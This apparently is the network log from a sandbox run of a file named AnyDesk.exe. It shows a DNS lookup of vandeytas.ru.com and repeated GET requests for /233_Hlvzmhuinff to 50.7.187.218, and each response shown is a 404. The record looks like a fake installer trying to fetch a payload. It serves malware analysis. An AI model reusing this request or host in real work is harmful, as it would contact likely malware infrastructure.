          Nov 26, 2024 08:11:07.517246962 CET192.168.2.61.1.1.10x5fb8Standard query (0)vandeytas.ru.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Nov 26, 2024 08:11:07.852077007 CET1.1.1.1192.168.2.60x5fb8No error (0)vandeytas.ru.com50.7.187.218A (IP address)IN (0x0001)false
          Nov 26, 2024 08:11:07.852108002 CET1.1.1.1192.168.2.60x5fb8No error (0)vandeytas.ru.com50.7.187.218A (IP address)IN (0x0001)false
          • vandeytas.ru.com
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.64970850.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:09 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:09 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:09 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.64971150.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:11 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:12 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:11 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:12 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.64971350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:13 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:14 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:14 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:14 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.64971550.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:16 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:16 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:16 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.64971850.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:18 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:18 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:18 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:18 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.64972550.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:20 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:21 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:20 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:21 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.64973350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:22 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:23 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:23 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:23 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.64974250.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:25 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:25 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:25 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          8192.168.2.64974950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:27 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:27 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:27 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:27 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          9192.168.2.64975650.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:29 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:29 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:29 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          10192.168.2.64976350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:31 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:32 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:31 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:32 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          11192.168.2.64977050.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:33 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:34 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:33 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:34 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          12192.168.2.64977850.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:35 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:36 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:36 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:36 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          13192.168.2.64978550.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:38 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:38 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:38 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
